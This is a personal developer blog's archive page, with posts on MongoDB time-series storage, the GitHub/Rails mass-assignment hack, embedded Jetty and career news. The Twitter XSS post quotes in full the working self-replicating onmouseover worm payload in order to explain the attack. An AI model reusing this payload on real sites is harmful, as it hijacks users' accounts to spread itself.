Efficient storage of non-periodic time series with MongoDB

Posted on 21 January 2015 - 18:20

TL;DR: this post explains the MongoDB storage structure we use at Actoboard to efficiently store non-periodic time series. Storing one Mongo document per data point is woefully inefficient, so we store data points in fixed-size segments, which speeds things up by more than an order of magnitude.

MongoDB makes the developer's life easier

When we started Actoboard, we decided to use MongoDB to store all our data. I had already used it successfully on several projects, and it makes things a lot easier than an SQL database when you have a rich data model with lots of polymorphic structures. You avoid the impedance mismatch between application objects and tables that has produced the object-relational monsters we've all loved to hate.

MongoDB is nice for all our configuration data (data sources, widgets, etc.): JSON documents are perfect for these fat polymorphic configuration objects, the volume of such data is limited, and the load is mostly reads, avoiding the lock problems Mongo has in write-heavy scenarios.

Time series need special attention

Time series data is a different beast, with a write-mostly load of tiny objects consisting of dataset id, timestamp and value. The naive approach of storing each data point as a tiny document will yield poor write performance, as the database has to allocate space for every tiny document holding a data point and add it to the index, which will be almost as large as the actual data.

Read performance will be bad too as the data for a series will be spread in many places on disk, requiring lots of disk seeks when reading a time slice. Deletion of expired data will also create lots of holes on disk, increasing load on the database's space allocator.
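To make the fixed-size segment idea from the TL;DR more concrete, here is a minimal in-memory sketch in Java. It does not use MongoDB or its driver: each Segment object simply stands for what would be one Mongo document holding up to SEGMENT_SIZE data points of a dataset. The class names, field layout and segment size of 4 are assumptions made for illustration, not the actual Actoboard schema, and the sketch assumes points arrive in timestamp order.

```java
import java.util.ArrayList;
import java.util.List;

// Hypothetical in-memory model of fixed-size segments; no MongoDB driver involved.
public class SegmentedSeries {
    static final int SEGMENT_SIZE = 4; // assumed value, kept tiny for the demo

    // One Segment stands for what would be stored as a single Mongo document.
    static final class Segment {
        final String datasetId;
        final long[] timestamps = new long[SEGMENT_SIZE];
        final double[] values = new double[SEGMENT_SIZE];
        int count = 0;

        Segment(String datasetId) { this.datasetId = datasetId; }

        boolean isFull() { return count == SEGMENT_SIZE; }

        void add(long timestamp, double value) {
            timestamps[count] = timestamp;
            values[count] = value;
            count++;
        }
    }

    final String datasetId;
    final List<Segment> segments = new ArrayList<>();

    SegmentedSeries(String datasetId) { this.datasetId = datasetId; }

    // Appends a point; timestamps may be irregular but are assumed to arrive in order.
    void append(long timestamp, double value) {
        if (segments.isEmpty() || segments.get(segments.size() - 1).isFull()) {
            segments.add(new Segment(datasetId)); // start a new "document"
        }
        segments.get(segments.size() - 1).add(timestamp, value);
    }

    // Counts points in [from, to], skipping whole segments outside the range.
    int countInRange(long from, long to) {
        int n = 0;
        for (Segment s : segments) {
            if (s.timestamps[s.count - 1] < from) continue; // segment ends too early
            if (s.timestamps[0] > to) break;                // later segments are newer
            for (int i = 0; i < s.count; i++) {
                if (s.timestamps[i] >= from && s.timestamps[i] <= to) n++;
            }
        }
        return n;
    }

    public static void main(String[] args) {
        SegmentedSeries series = new SegmentedSeries("visits");
        long[] irregular = {1000, 1007, 1050, 1051, 1300, 2000, 2001, 5000, 9000, 9100};
        for (long t : irregular) {
            series.append(t, t / 100.0);
        }
        System.out.println(series.segments.size() + " segments");        // 3 segments
        System.out.println(series.countInRange(1000, 2000) + " points"); // 6 points
    }
}
```

With ten irregularly spaced points and a segment size of 4, the series fits in 3 segments instead of 10 tiny documents, and a time-slice read can skip whole segments that end before the requested range.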


GitHub hack: a common security flaw in webapp frameworks

Posted on 08 March 2012 - 12:55

GitHub has been hit by a spectacular hack: a frustrated developer exploited a weakness in Ruby on Rails to gain commit access to the Rails master branch and to create issues dated in the future. As a result, GitHub is asking us to confirm our SSH keys, but this flaw could have been used to change almost any data in the system.

How's it possible?

This weakness comes from the mass assignment feature in Rails. To ease development and increase productivity, Rails allows an object to be filled with any HTTP request parameter whose name matches an attribute of the object. All is well when people use the forms provided by your web pages, because they only send parameters for the attributes that you (the developer) want to be changed. Things are different when someone forges a request: your object is wide open, and they can change any of its attributes.

If you have a User class with properties id, name, password and role, then a user with role "visitor" can upgrade himself to "administrator" simply by using the profile editing URL. Or he can change another user's password, and gain access to that account, by changing the id value. And so on.
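A minimal Java sketch of the problem, assuming a hypothetical bindAll helper that uses reflection to copy every request parameter onto a matching field, roughly what a framework does behind the scenes. This is not the Rails implementation, just an illustration of why binding everything is dangerous.

```java
import java.lang.reflect.Field;
import java.util.Map;

// Hypothetical illustration of naive mass assignment, not the Rails implementation.
public class MassAssignmentDemo {
    static class User {
        long id;
        String name;
        String password;
        String role = "visitor";
    }

    // Copies every parameter whose name matches a field: no filtering at all.
    static void bindAll(Object target, Map<String, String> params) throws ReflectiveOperationException {
        for (Map.Entry<String, String> e : params.entrySet()) {
            Field field;
            try {
                field = target.getClass().getDeclaredField(e.getKey());
            } catch (NoSuchFieldException unknown) {
                continue; // parameters that match no field are ignored
            }
            field.setAccessible(true);
            if (field.getType() == long.class) {
                field.setLong(target, Long.parseLong(e.getValue()));
            } else {
                field.set(target, e.getValue());
            }
        }
    }

    public static void main(String[] args) throws Exception {
        User user = new User();
        user.id = 42;
        user.name = "Mallory";
        // The profile form only sends "name", but a forged request also sends "role"
        bindAll(user, Map.of("name", "Mallory", "role", "administrator"));
        System.out.println(user.name + " is now " + user.role); // Mallory is now administrator
    }
}
```

Sending an "id" parameter in the same way would let the request target another user's record, which is the password-change scenario described above.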

Most modern web frameworks have this mass assignment feature. They let the developer restrict the assignable attributes with whitelists or blacklists, but most if not all of them leave it wide open by default. This is a convenient feature for developers, but how many of them will even think of protecting their models?
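For contrast, here is a sketch of whitelist-based binding (Rails itself offered attr_accessible for whitelists and attr_protected for blacklists). The hypothetical filter method only keeps parameters listed in ASSIGNABLE, and the model is simplified to a map of attribute names to values; the contents of ASSIGNABLE are assumptions.

```java
import java.util.HashMap;
import java.util.Map;
import java.util.Set;

// Hypothetical whitelist-based binding; the model is simplified to a Map.
public class WhitelistBinding {
    // Attributes the profile form is allowed to change (assumed list).
    static final Set<String> ASSIGNABLE = Set.of("name", "password");

    // Keeps only whitelisted parameters; everything else is silently dropped.
    static Map<String, String> filter(Map<String, String> params, Set<String> allowed) {
        Map<String, String> safe = new HashMap<>();
        for (Map.Entry<String, String> e : params.entrySet()) {
            if (allowed.contains(e.getKey())) {
                safe.put(e.getKey(), e.getValue());
            }
        }
        return safe;
    }

    public static void main(String[] args) {
        Map<String, String> user = new HashMap<>(Map.of("id", "42", "name", "Alice", "role", "visitor"));
        // Forged request trying to change role and id along with the name
        Map<String, String> forged = Map.of("name", "Alice B.", "role", "administrator", "id", "1");
        user.putAll(filter(forged, ASSIGNABLE));
        System.out.println(user.get("name") + " / " + user.get("role") + " / " + user.get("id"));
        // Alice B. / visitor / 42
    }
}
```

A whitelist is the safer of the two: an attribute added to the model later stays protected until someone explicitly declares it assignable.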


My 2011: a year like no other

Posted on 01 January 2012 - 13:15

This blog has been mostly silent in 2011. Blame both Twitter, which makes capturing quick thoughts so easy, and a busy year in which I started my freelance business. But a new year is starting, and along with the traditional wishes I owe an update to the people who still drop by. There have been many important events in the world this year, but I will talk about selfish me, since this year has been like no other in my professional life.

I'm my own boss!

When I decided to go freelance, I thought it would be for a limited time while I set up a new startup project. It turned out that this project was rather ambitious, the kind I was a bit tired of, requiring a lot of work before reaching out to the world, and that the people I had planned to build it with were not the right ones for this kind of venture.

So I started to grow my freelance business, working 3 days a week architecting and developing the backend systems of a new M2M solution using J2EE (mostly Jetty and Spring), Hazelcast and MongoDB, and doing some short expert consulting gigs in various domains: data collection architecture, mobile geolocation app strategy, search engines, etc. I also did some fun side projects exploring augmented reality and Kinect hacks with my son and my friends at Tetalab, the Toulouse hackerspace.


How often do you redeploy your J2EE application?

Posted on 11 January 2011 - 11:37

The guys at ZeroTurnaround have published an interesting report on the development habits of over 1,300 Java developers. One of the questions that really struck me was "how often do you redeploy?"

My answer to this question is "on my development machine, never". I use Jetty, which is really easy to embed in a regular application, so all of the projects I work on have this tiny class in their src/run/java directory:

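package net.bluxte.project;

import org.eclipse.jetty.server.Server;
import org.eclipse.jetty.server.nio.SelectChannelConnector;
import org.eclipse.jetty.webapp.WebAppContext;

public class StartProject {
    public static void main(String[] args) throws Exception {
        Server server = new Server();
        // Non-blocking connector (Jetty 7/8 API); port 8080 is an assumed value
        SelectChannelConnector connector = new SelectChannelConnector();
        connector.setPort(8080);
        server.addConnector(connector);

        // Serve the webapp straight from the source tree, with classes from the IDE's classpath
        WebAppContext context = new WebAppContext("src/main/webapp", "/");
        server.setHandler(context);

        server.start();
        server.join(); // block until the server is stopped
    }
}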

This tiny class lets me start the server with a single click on Eclipse's "Run" or "Debug" toolbar icons, using the project's classpath, where everything has already been compiled by the IDE. No need to build a WAR file, no need to attach to a remote JVM for debugging, no need to wait for long package/deploy/restart operations. And of course code hotswap works just as it should and makes debugging a breeze.

The answer "on my development machine, never" is incomplete, though: I should add "on the integration server, every time a source file changes", since Hudson picks up any change, runs a full build/test cycle and automatically deploys the new version on a test machine.

Complex "enterprisey" frameworks and specifications have made us forget that things can be simple if you think a bit, and that it also often pays to do a bit of "development design" to increase the developer's productivity without resorting to "helper tools" that only add some bloat to the process.


New year, new job

Posted on 10 January 2011 - 11:05

It's been 2 months since I left my previous job. I used this time to get some rest, think about what I wanted to do next, meet people and have lots of discussions. I've also been asking myself whether it was time to join a larger company and leave behind the crazy but exciting world of startups. Leaving it felt like abandoning an environment where creation and ideas are king for something more structured, more "quiet" I would say, but also with larger projects.

I finally decided I still had a lot to do in startups, after meeting a guy who has been passionate about 3D virtual worlds for years and sharing intense excitement with him when talking about WebGL, which will soon bring native 3D to modern browsers. So we decided to explore this route and set up a project that will hopefully lead to a new startup.

In the meantime, I've established myself as a freelance consultant, to keep bringing home the bacon and because my experience seems to be of interest! I've already started working part time architecting the backend systems of a former colleague's new startup. This fills my schedule for now, but I'm always open to interesting proposals.

So check out my resume and let's get in touch if you think I could help you in your projects.

My last day at Goojet

Posted on 29 October 2010 - 17:41

Today was my last day at Goojet. I've been the CTO there since April 2008, and had been involved informally with their team since even before the company was created in 2007.

As in every startup, there have been ups and downs: incredible times with amazing creative energy, and times of doubt when the result of our work did not seem to attract as many users as we expected. We reinvented ourselves a couple of times and have some very loyal users, but still not the masses that make a success. The company must now focus on a smaller and more agile core, and the technical challenges aren't as complex and motivating for me as they were when I joined. This is why we decided it was time for me to move on to something else.

At Goojet I learned the many sides of developing for mobiles: the importance of user experience, network latency, buggy operator gateways, device fragmentation with a J2ME application that runs on more than 400 phones, and the great fun that is developing on iPhone and Android. On the backend side, I was even closer to operations than I was at Joost, being responsible for the overall system architecture and quality of service.

I will miss the team. Very talented people, some of whom have been working with me for 6 years or more, since they started as interns at Anyware, then became employees and embarked with me on the Joost adventure, and others whom I came to know and value in this job. It feels like leaving behind people you have helped grow, but I know they're great professionals who will do a great job without my guidance. And they're still good friends, even if they're no longer colleagues!

So what's next for me? I have realized that I need to take a break from the emotional involvement and more-than-fulltime dedication that is required by being a founder or CTO of a small startup. I will probably work as a consultant to see other projects, meet new people, address different challenges.

Check out my resume and let me know if you think we should be working together!


Today is the answer to Life, the Universe and Everything

Posted on 10 October 2010 - 10:10

Warning: super-geeky stuff ahead :-)

Today is October 10, 2010, or in other words 10-10-10. This is a notable date in itself, but it gets even more interesting when you consider that 101010 is the binary value of 42!

So today is not only 10-10-10, but also the day of the answer to Life, the Universe and Everything!
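For the doubters, the conversion can be checked with two standard Java calls, Integer.parseInt with a radix of 2 and Integer.toBinaryString: 101010 in binary is 32 + 8 + 2 = 42. The class name is just a placeholder.

```java
public class TenTenTen {
    public static void main(String[] args) {
        int answer = Integer.parseInt("101010", 2);     // read the string as base 2
        System.out.println(answer);                     // 42
        System.out.println(Integer.toBinaryString(42)); // 101010
    }
}
```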

And to be even more geeky (or scary): guess who made me notice that? My 14-year-old son...

10 years ago, my first mail to Apache...

Posted on 07 October 2010 - 21:43

Damn, I missed the date! A bit more than 10 years ago, on September 4, 2000, I sent my very first mail to an Apache mailing list, cocoon-users. The day after, I sent my first mail to cocoon-dev. And again, and again, and again... More than 4,700 mails sent to the Cocoon lists over 10 years!

As you can see from the graph, my mails/month rate grew steadily until the beginning of 2006, when Joost absorbed all my time and energy with quite tricky but nevertheless fun stuff!

I'm no longer involved in Cocoon, like many of the old-timers I worked with at that time, but it has been incredibly rewarding, both personally, for all the friends I made, and professionally, for all the things I learned and the changes in my career path.

Twitter victim of a basic XSS attack

Posted on 21 September 2010 - 16:40

The (twit)world has been taken by storm by today's JavaScript injection attack against Twitter. This attack is so basic that it's surprising neither the Twitter team nor script kiddies found it earlier.

Here's what it looks like:

[Screenshot: Twitter XSS]

The code for the black section is the following:

<span class="entry-content"><a href="http://a.no/@"onmouseover=";$('textarea:first').val(this.innerHTML);$('.status-update-form').submit()" style="color:#000;background:#000;/" class="tweet-url web" rel="nofollow" target="_blank">http://a.no/@"onmouseover=";$('textarea:first').val(this.innerHTML);$('.status-update-form').submit()" style="color:#000;background:#000;/</a></span>

The hacker simply posted a URL (the one starting with http://a.no/@ in the code above) containing a double quote that closes the link's href attribute. From there on, the door is wide open to do nasty things.

The script replicates itself by automatically posting the script-injection URL on behalf of the current user. The clever bit is the style attribute, also injected, which turns the cryptic link into a black-on-black area and "invites" curious users to move their mouse over it. This is when the onmouseover handler kicks in and replicates the worm.

Although it spreads like wildfire, it doesn't do much harm beyond replicating itself. But a malicious variation could well send your authentication cookie to a remote server so that its owner can use your Twitter account.
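The root cause is that user-supplied text was written into an HTML attribute without escaping the double quote. Below is a minimal Java sketch with a hypothetical escapeAttribute helper; the payload is a simplified stand-in for the worm's URL, and a real application would rather rely on its template engine's or a well-tested library's encoder.

```java
// Hypothetical HTML attribute escaping helper, for illustration only.
public class AttributeEscaping {
    // Encodes the characters that can break out of a quoted attribute value.
    static String escapeAttribute(String s) {
        StringBuilder sb = new StringBuilder(s.length());
        for (char c : s.toCharArray()) {
            switch (c) {
                case '&': sb.append("&amp;"); break;
                case '"': sb.append("&quot;"); break;
                case '\'': sb.append("&#39;"); break;
                case '<': sb.append("&lt;"); break;
                case '>': sb.append("&gt;"); break;
                default: sb.append(c);
            }
        }
        return sb.toString();
    }

    public static void main(String[] args) {
        String url = "http://a.no/@\"onmouseover=\"alert(1)";
        // The quotes are encoded, so they can no longer close the href attribute
        String html = "<a href=\"" + escapeAttribute(url) + "\">link</a>";
        System.out.println(html);
        // <a href="http://a.no/@&quot;onmouseover=&quot;alert(1)">link</a>
    }
}
```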


ColiPoste: two delivery attempts, double penalty

Posted on 10 May 2010 - 12:28

To my English-speaking readers: this is a rant about the French national parcel delivery service, which insists on ringing at my door twice (one day, then again the next) while I'm at work, causing frustrating delivery delays.

For once, here is a post in French, and on a non-technical topic. But it's about a very French institution, La Poste. This is the story of a parcel that was sent to me last Tuesday (May 4), was presented at my home two days later, on May 6, but that I won't get until tomorrow, May 11.

For some time now, the parcel delivery service, ColiPoste, has had the "bright idea" of presenting each parcel at your home twice. If the delivery person comes and you're out, they leave a note saying they will come back the next day. And if you're not there the next day either, you can finally collect the parcel at your usual post office the day after that.

We all know the song: "Monday morning, the king, his wife and the little prince came to my house to shake my hand. Since I was out, the little prince said 'well, if that's how it is, we'll come back on Tuesday'. Tuesday morning, the king, his wife and the little prince..." And so on, ad nauseam. If I'm not home on a weekday, it's most likely because I'm at work, so I'll be out the next day too! And then I have to wait yet another day before I can go to the post office to collect my parcel. Double penalty...
